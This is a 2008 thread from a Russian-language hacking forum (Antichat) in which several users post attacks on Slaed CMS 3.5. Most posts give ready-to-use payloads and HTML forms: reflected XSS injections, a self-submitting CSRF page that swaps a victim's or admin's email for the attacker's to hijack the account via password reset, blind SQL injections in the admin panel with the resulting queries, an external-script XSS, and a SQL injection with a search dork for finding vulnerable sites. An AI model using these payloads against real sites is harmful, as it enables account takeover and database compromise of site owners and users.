ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 11.05.2008, 00:38
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Пассивная XSS в Slaed CMS v. 3.5:

POST-запрос:
Код:
subject=%3Cimage+src%3Duploads%2Favatars%2F00.gif+onload%3Dalert%28%2Flala%2F%29%3E&hometext=1
Ну или создать:
Код:
<form method="POST" action="http://site/index.php?name=FAQ&op=add">
 subject: <input type="text" name="subject"/><br />
 hometext: <input type="text" name="hometext" value="1"/><br />
 <input type="submit" />
</form>
и в поле subject прописать:
Код:
<image src=uploads/avatars/00.gif onload=alert(/lala/)>
В src должен быть указан путь к реально существующей картинке, параметр hometext должен быть установлен, значение может быть любым. Работает, если у пользователя есть права на добавление, даже при включеной предмодерации.

Моё, кажется нигде не было.

З.Ы.
Предложение модераторам: Может топик переименовать в просто Slaed CMS, без номера версии?
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 11.05.2008 в 00:42..
 
Ответить с цитированием

  #12  
Старый 11.05.2008, 01:53
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Ещё пассивная XSS в Slaed CMS v. 3.5:

Код:
<form method="POST" action="http://site/index.php?name=Account">
 url: <input type="text" name="url"/><br />
 <input type="submit" />
</form>
В поле url прописать:
Код:
"><image src=uploads/avatars/00.gif onload=alert(/XSS/)>
Как и в прошлом случае, src должно указывать на существующий файл.

З.Ы.
Примечательно, что в гет-запросах движок символ " не пропускает, а в пост- нормально
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 11.05.2008 в 02:00..
 
Ответить с цитированием

  #13  
Старый 11.05.2008, 03:32
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

CSRF в Slaed CMS 3.5 :

На свой сервер положить страничку со следующим содержимым, и заманить туда юзера:
Код:
<body onload="p.submit()">
<form method="POST" action="http://site/index.php?name=Account&op=savehome" id="p">
<input type="hidden" name="user_email" value="ВАШЕ_МЫЛО"/><br />
</form>
Таким образом у пользователя сменится e-mail на ваш, (даже у админа), затем, на него можно запросить изменение пароля по этой ссылке: http://site/index.php?name=Account&op=passlost
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #14  
Старый 11.05.2008, 16:13
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Ещё пассивки в POST-запросах в Slaed CMS 3.5:

Код:
<form method="POST" action="http://site/index.php?name=News&op=add">
 postname: <input type="text" name="postname"/><br />
 <input type="submit" />
</form>
В поле url прописать:
Код:
"><image src=uploads/avatars/00.gif onload=alert(/XSS/)>
Поле src должно указывать на существующий файл. (Варианты с просто <script> и <body onload=""> не прокатят )

Так-же уязвимо поле Subject.

--------------------------------------

Тут:
Код:
http://site/index.php?name=Info
уязвимо поле url. Также POST запрос:
Код:
"><image src=uploads/avatars/00.gif onload=alert(/XSS/)>
---------------------------------------

Код:
http://site/index.php?name=Files&op=add
уязвимы поля: author, authormail, authorurl, title, cid
-------------------------------------
Код:
http://site/index.php?name=Auto_Links&op=add
уязвимы поля: a_sitelink, a_sitename, a_adminemail
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 11.05.2008 в 18:48..
 
Ответить с цитированием

  #15  
Старый 11.05.2008, 16:50
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Blind SQL-Injection в админке Slaed CMS 3.5:

Код:
<form method="POST" action="http://site/admin.php?op=news_save">
 sid: <input type="text" name="sid"/><br />
 subject: <input type="text" name="subject" value="subject"/><br />
 hometext: <input type="text" name="hometext" value="SQL1"/><br />
 postname: <input type="text" name="postname" value="postname"/><br />
 bodytext: <input type="text" name="bodytext" value="SQL2"/><br />
 posttype: <input type="text" name="posttype" value="save"/><br />
 <input type="submit" />
</form>
Уязвимы поля hometext и bodytext. Если установлено поле sid, то запрос выглядит так:
Код:
UPDATE TKR_stories SET catid='', aid='postname', title='subject', time='2008-5-11 16:45:00', hometext='SQL1', bodytext='SQL2', field='', ihome='', acomm='', associated='', status='1' WHERE sid='1'
Если поле sid не установлено, то так:
Код:
INSERT INTO TKR_stories VALUES (NULL, '', 'postname', 'subject', '2008-5-11 16:47:00', 'SQL1', 'SQL2', '', '0', '0', '', '', '0', '0', '', '1')
Остальные поля должны быть установлены, у поля posttype должно быть значение save.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #16  
Старый 11.05.2008, 19:19
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Ещё одна Blind SQL-Injection в админке Slaed CMS 3.5:

Код:
<form method="POST" action="http://site/admin.php?name=Auto_Links&op=auto_links_save">
 a_id: <input type="text" name="a_id"/><br />
 a_description: <input type="text" name="a_description" value="SQL"/><br />
 a_sitename: <input type="text" name="a_sitename" value="1"/><br />
 posttype: <input type="text" name="posttype" value="save"/><br />
 <input type="submit" />
</form>
Если установлено поле a_id, то запрос выглядит так:
Код:
UPDATE TKR_auto_links SET sitename='1', description='SQL', link='', mail='', hits='0', outs='0' WHERE id='1'
если нет, то так:
Код:
INSERT INTO TKR_auto_links VALUES (NULL, '1', 'SQL', '', '', '0', '0', now())
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #17  
Старый 11.05.2008, 23:23
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Ещё пассивки в POST-запросах в Slaed CMS 3.5:
Код:
http://test6.ru/index.php?name=Pages&op=add
Уязвимы postname, subject
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #18  
Старый 09.06.2008, 14:15
RRRinat
Новичок
Регистрация: 01.12.2007
Сообщений: 3
Провел на форуме:
23389

Репутация: 0
По умолчанию

SLAED.net на хрен взломан. Сейчас - недостпен.
http://antislaedcms.ru/index.php?showtopic=2513
http://forum.slaedsuck.com/
 
Ответить с цитированием

Xss в SLAED CMS 3.5
  #19  
Старый 03.08.2008, 22:18
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию Xss в SLAED CMS 3.5

Post-запрос на странице http://site/index.php?name=Account &op=new_user
Код:
"><script src=http://site/script.js>
в полях- gfx_check та random_num
 
Ответить с цитированием

  #20  
Старый 04.09.2008, 21:08
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

sql-inj в модуле анекдотов Jokes (дефолтный в слаед 3.3+ )
параметр cat:
Цитата:
/index.php?name=Jokes&op=CatView&cat={sql}
dork:
Цитата:
inurl:index.php?name=Jokes+inurl:cat=
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WCPS ] Dr.Z3r0 Сценарии/CMF/СMS 33 09.06.2010 14:53
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Сценарии/CMF/СMS 42 07.05.2010 19:07
Обзор уязвимостей в платных CMS ZAMUT Сценарии/CMF/СMS 56 15.04.2010 21:02
[ Обзор уязвимостей Exponent CMS ] ZAMUT Сценарии/CMF/СMS 1 02.02.2010 21:59
[ Обзор уязвимостей Gekko CMS ] Grey Сценарии/CMF/СMS 0 03.02.2008 20:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ